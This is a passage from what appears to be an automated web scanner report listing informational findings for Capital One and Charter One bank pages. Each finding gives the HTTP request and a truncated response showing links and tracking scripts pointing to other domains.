Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 27487

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Finan
...[SNIP]...
<noscript><iframe src="https://switch.atdmt.com/iaction/community_affairs_sem_1/v3/atz.FBBE6C4A1C9B8436" width="1" height="1" frameborder="0"
scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0">
</iframe>
...[SNIP]...
<td valign="top">Capital One and Search Institute have developed <a href="http://www.bankit.com" target="_blank">Bank It</a>
...[SNIP]...

16.58. http://www.capitalone.com/smallbusiness/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /smallbusiness/?linkid=WWW_1009_SBUS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_17_T_SB1 HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:58 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=W9HtNJWTnQGllch3pXxkL3TKXyJwhGLCl9P3xbFCLfrvYFRq9yh6!1941958184; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDczMzMwV2VhL3Q4TFdITkRvMHhDTW9rRWFRPT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 59681

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Browse our small business banking products includin
...[SNIP]...
<li><a href="https://towernet.capitalonebank.com/loginpage.html">TowerNET</a>
...[SNIP]...
<li><a href="https://top.capitalonebank.com/cashplus/">Treasury Optimizer</a>
...[SNIP]...
<!-- For Atlas DMT -->

   
                                                                                                                   <script type="text/javascript" src="http://switch.atdmt.com/jaction/COSB_HP_INDEX_4/v3/atz.FBBE6C4A1C9B8436"></script>
   <noscript><iframe src="http://switch.atdmt.com/iaction/COSB_HP_INDEX_4/v3/atz.FBBE6C4A1C9B8436" width="1" height="1" frameborder="0" scrolling="no" marginheight="0"
       marginwidth="0">
</iframe>
...[SNIP]...

16.59. http://www.capitalone.com/smallbusiness/business-money-market/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/business-money-market/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /smallbusiness/business-money-market/?linkid=WWW_1009_SBUS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_21_T_SBMMOV HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:00 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=1gpFNJWQgbphhGmLXDdPfzgRQ1jhp2nlk19F9MLX8cwZfqBWYZQs!-1643189261; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNTMwMTlqbzU1bEJXMTh1REF5ZFBhbEZNMDRnPT0=; expires=Tuesday, 21-Feb-2079 01:26:07 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:12:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 60850

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Open Capital One Direct Banking Savings accounts: B
...[SNIP]...
<li><a href="https://towernet.capitalonebank.com/loginpage.html">TowerNET</a>
...[SNIP]...
<li><a href="https://top.capitalonebank.com/cashplus/">Treasury Optimizer</a>
...[SNIP]...
<!-- For Atlas DMT -->

   
                                                                                                                   <script type="text/javascript" src="http://view.atdmt.com/jaction/nyccps_NDB_BMM/v3/atz.FBBE6C4A1C9B8436"></script>
   <noscript><iframe src="http://view.atdmt.com/iaction/nyccps_NDB_BMM/v3/atz.FBBE6C4A1C9B8436" width="1" height="1" frameborder="0" scrolling="no" marginheight="0"
       marginwidth="0">
</iframe>
...[SNIP]...

16.60. http://www.capitalone.com/smallbusiness/cards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/cards/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /smallbusiness/cards/?linkid=WWW_1009_SBUS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_06_T_SBCD HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:54 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=hGb7NJWKnJ2vHG2n9vypBcjs4vbjVr2LQYJ1PZZChyXdSxJ4Hz8g!-1643189261; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNTI5OThXSW81cXlGMndPb3dHMFlBTTF5c3JRPT0=; expires=Tuesday, 21-Feb-2079 01:26:01 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:54 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 68542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Browse business credit cards online and apply for C
...[SNIP]...
<li><a href="https://towernet.capitalonebank.com/loginpage.html">TowerNET</a>
...[SNIP]...
<li><a href="https://top.capitalonebank.com/cashplus/">Treasury Optimizer</a>
...[SNIP]...
<!-- For Atlas DMT -->

   
                                                                                                                   <script type="text/javascript" src="http://view.atdmt.com/jaction/nyccos_COSB0125mainpage_1/v3/atz.FBBE6C4A1C9B8436"></script>
   <noscript><iframe src="http://view.atdmt.com/iaction/nyccos_COSB0125mainpage_1/v3/atz.FBBE6C4A1C9B8436" width="1" height="1" frameborder="0" scrolling="no" marginheight="0"
       marginwidth="0">
</iframe>
...[SNIP]...

16.61. http://www.capitalone.com/smallbusiness/cards/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/cards/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /smallbusiness/cards/index.php?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C5_05_T_SBCDSBCD HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:57 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=bpTpNJWN5y0FKt7jN26C4KJkmmTzdjcGngqyhsyPCn21QWfG20ys!1025162061; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDkzMDYySHhrck1qdVU3amNkL2J3bjBNdml3PT0=; expires=Tuesday, 21-Feb-2079 01:26:04 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 68542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Browse business credit cards online and apply for C
...[SNIP]...
<li><a href="https://towernet.capitalonebank.com/loginpage.html">TowerNET</a>
...[SNIP]...
<li><a href="https://top.capitalonebank.com/cashplus/">Treasury Optimizer</a>
...[SNIP]...
<!-- For Atlas DMT -->

   
                                                                                                                   <script type="text/javascript" src="http://view.atdmt.com/jaction/nyccos_COSB0125mainpage_1/v3/atz.FBBE6C4A1C9B8436"></script>
   <noscript><iframe src="http://view.atdmt.com/iaction/nyccos_COSB0125mainpage_1/v3/atz.FBBE6C4A1C9B8436" width="1" height="1" frameborder="0" scrolling="no" marginheight="0"
       marginwidth="0">
</iframe>
...[SNIP]...

16.62. http://www.capitalone.com/smallbusiness/payroll/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/payroll/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /smallbusiness/payroll/?linkid=WWW_1009_SBUS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_20_T_SBPROV HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:58 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=Gd2YNJWTKRn9F74Q5L1KQsykx6pqRNXtQnr7JnppQ6n3ZH5XhypT!-2092074449; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDM1OThRaEhkemdRSmpSZWw2cEF0L25qMVd3PT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 49209

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Business Payroll (SM) - Capital One"/><meta name="k
...[SNIP]...
<li><a href="https://towernet.capitalonebank.com/loginpage.html">TowerNET</a>
...[SNIP]...
<li><a href="https://top.capitalonebank.com/cashplus/">Treasury Optimizer</a>
...[SNIP]...
<!-- For Atlas DMT -->

   
                                                                                                                   <script type="text/javascript" src="http://switch.atdmt.com/jaction/nyccos_COSB_SD_Payroll_Overview/v3/atz.FBBE6C4A1C9B8436"></script>
   <noscript><iframe src="http://switch.atdmt.com/iaction/nyccos_COSB_SD_Payroll_Overview/v3/atz.FBBE6C4A1C9B8436" width="1" height="1" frameborder="0" scrolling="no" marginheight="0"
       marginwidth="0">
</iframe>
...[SNIP]...

16.63. http://www.charterone.com/greensense/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /greensense/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /greensense/?WT.ac=greensense HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:30 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <h
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1791096;type=green08;cat=chargrhp;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcst1s1qz00000s5jw3dagrbs_7i7l/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>

<!-- *** CLICK TRACKING CODE 3.0 *** -->
<script language="JavaScript" type="text/javascript" defer="1" src="https://tracking.keywordmax.com/tracking/show.php?id=507865640&blockengines=WS&location=Homepage"></script>
<noscript>
<img src="https://tracking.keywordmax.com/tracking/log.php?id=507865640&blockengines=WS&loc=Homepage" border="0" width="1" height="1">
</noscript>
...[SNIP]...

16.64. http://www.charterone.com/moneyhelp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /moneyhelp/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /moneyhelp/?WT.ac=moneyhelp HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:14:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:22:39 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19634


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcst1s1qz00000s5jw3dagrbs_7i7l/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.65. http://www.charterone.com/savings-and-cds/goaltrack-savings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /savings-and-cds/goaltrack-savings.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /savings-and-cds/goaltrack-savings.aspx?WT.ac=goaltracksavings HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:13:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:22:27 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 43184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...
<li class=''><a href="https://www.charteroneonline.com">Login to Online Banking</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1791096;type=savpropg;cat=gtsproch;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<noscript>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0" width="374" height="236" id="leaderboard" align="middle">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcst1s1qz00000s5jw3dagrbs_7i7l/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.66. http://www.charterone.com/services/standard-overdraft-practices.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /services/standard-overdraft-practices.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /services/standard-overdraft-practices.aspx?WT.ac=standardoverdraftpractices HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:35 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 27355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...
<li class=''><a href="https://www.charteroneonline.com">Login to Online Banking</a>
...[SNIP]...
</strong> <a href="https://www.charteroneonline.com">Login</a>
...[SNIP]...
<div class="borderButtonWrapper">
<a href="https://www.charteroneonline.com/en.html" class="input borderButton">Enroll Now</a>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcst1s1qz00000s5jw3dagrbs_7i7l/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.67. http://www.charterone.com/tools/leaving.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /tools/leaving.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /tools/leaving.aspx?url=http://www.fdic.gov HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:16:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:26:20 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 13362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcst1s1qz00000s5jw3dagrbs_7i7l/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.68. http://www.charterone.com/tools/regionalgateway.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /tools/regionalgateway.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /tools/regionalgateway.aspx?url=%2fDefault.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:16:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: HiddenPopup=popup=False; path=/
Set-Cookie: HiddenError=error=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcst1s1qz00000s5jw3dagrbs_7i7l/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.69. http://www.charterone.com/trufitstudentloan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /trufitstudentloan/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /trufitstudentloan/?WT.ac=trufitstudentloan HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:35 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 46345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...
<li><a href="https://firstapp2.firstmarkservices.com/charterone/consumer/" class="borderButton">Apply now</a>
...[SNIP]...
<p><a href="https://firstapp2.firstmarkservices.com/charterone/consumer/" class="borderButton">Apply now</a>
...[SNIP]...
<p><a href="https://firstapp2.firstmarkservices.com/charterone/consumer/" class="borderButton">Apply now</a>
...[SNIP]...
<p>
